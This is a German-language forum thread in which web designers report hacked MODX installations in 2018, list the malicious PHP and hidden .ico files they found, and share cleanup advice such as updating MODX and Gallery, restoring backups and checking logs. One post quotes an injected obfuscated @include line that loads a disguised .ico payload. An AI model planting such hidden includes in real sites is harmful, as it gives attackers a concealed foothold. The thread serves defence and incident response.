Angriff auf MODX Seiten

wir haben einen Hinweis von 1&1 bekommen, dass in unserer MODX installation 2 PHP Dateien aufgetaucht sind, die schädlich sind. Von einer anderen Webdesignerin weiss ich, dass auch sie diese Meldung von 1&1 erhalten hat. Es ist keine Phishing Mail. Die Dateien wurden echt agelegt und von 1&1 gesperrt.
Hat noch jemand von euch diese Probleme? Kann ein Shadcode über das CMS eingeschleut werden oder nur über FTP?
~/modx/assets/components/ace/sxk5cefpsf.php
~/modx/2jtybto4wu.php

MODX 2.6.5 und Gallery 1.7.1 schnellstmöglich in noch nicht gehackten Installationen einspielen. Gallery 1.7.0 und vorher ist leider ohne Login angreifbar. MODX 2.6.4 nur mit einem Login in einen beliebigen Kontext.

Vielen Dank. Wird sofort gemacht. Wie erkenne ich, dass Dateien eingeschleußt wurden, ausser durch einen Hinweis von 1&1?

1&1 setzt alle Dateien mit einem erkannten Hack auf write-only. Ansonsten alles runterladen und per Virenscanner überprüfen.

Seit ein paar Tagen wird einer meiner Server massiv angegriffen. Drei von fünf Installationen sind bei STRATO betroffen. Index Dateien und htaccess werden umgeschrieben.


.a5a01f94.ico
.bb9536c0.ico
.c87b6257.ico
.d0908ae6.ico
7cwxqdt1ce.php
29m4x9wh48.php
5746m905e7.php
css.php.php.png
icees.php.php.png
jwdzatia.php
njrufwpg.php
o4c0qi5a17.php

Hattest du bereits die neue Version drauf oder noch die alte?
Was wird im Index und htaccess umgeschrieben?

Es werden zusätzlich Elemente, wie

/*b441d*/

@include "\057var/\167ww/v\150osts\057baue\162nhau\163-ate\154ier.\144e/ht\164pdoc\163/ass\145ts/i\155g/sy\155bols\057.a5a\0601f94\056ico";

/*b441d*/

eingefügt.

Übrigens ist auch pdotools betroffen.

Habe glaube ich alles wieder im Griff. Aber sicher kann ich erst sein, wenn ich alles komplett neu gemacht habe.

Quote from: alfi65 at Jul 21, 2018, 08:11 AM

Vielen Dank. Wird sofort gemacht. Wie erkenne ich, dass Dateien eingeschleußt wurden, ausser durch einen Hinweis von 1&1?

Der Beitrag hier zum Auffinden von kompromittierten Dateien hilft. Ansonsten mach es, wie ich:

1. Jedes Verzeichnis und jede Datei kontrollieren, oder
2. komplett neu aufsetzen.

Ich schieb die betroffenen Domains auf einen andern meiner Server und prüfe auf dem alten Server, auf Unregelmässigkeiten.

Noch ist mir nicht klar, wie das gemacht wird, guck' ich mir aber genau an, wenn alles wieder dicht ist. ;-))

Quote from: rnrkrft at Aug 25, 2018, 11:23 AM

Der Beitrag hier zum Auffinden von kompromittierten Dateien hilft. Ansonsten mach es, wie ich:

Sorry, welcher Beitrag "hier" zum Auffinden? (oder habe ich dich missverstanden?)

Quote from: alfi65 at Aug 26, 2018, 07:28 AM

Quote from: rnrkrft at Aug 25, 2018, 11:23 AM

Sorry, welcher Beitrag "hier" zum Auffinden? (oder habe ich dich missverstanden?)

Der Beitrag https://forums.modx.com/thread/94643/how-to-clean-up-your-hacked-webspace im Forum war gemeint.
Backup einspielen, sofort updaten auf 2.6.5 (2.7-dev aus dem GIT wollte ich nicht) und sofort alle Updates für die Plugins machen. Dann überwachen. Sobald wieder Index-Dateien geschrieben werden, unsichtbare ICONs auftauchen, sich ein Datum ändert - nochmal von Vorne. Falls es nicht hilft, ein älteres Backup versuchen.

Bei einer Installation stand in den Packages dann noch die Galerie 1.7.0 auf der Platte, obwohl im Manager gelöscht (kein Wunder bei dem ständigen hin und her). Also alle Verzeichnisse händisch prüfen - dann klappt 's auch (Finger gekreuzt).

Logs durchsuchen und eventuell IPs sperren, die fail2ban nicht erwischen kann.

Mein Hacker Angriff betraf nicht nur die Server auf denen die Seiten liegen. Die Seiten wurden auch bei Google übernommen. In der Google-Konsole stand ein neuer Eigentümer, über Analytics legitimiert.

Hat einige Tage gekostet, aber ich habe hoffentlich alles erwischt.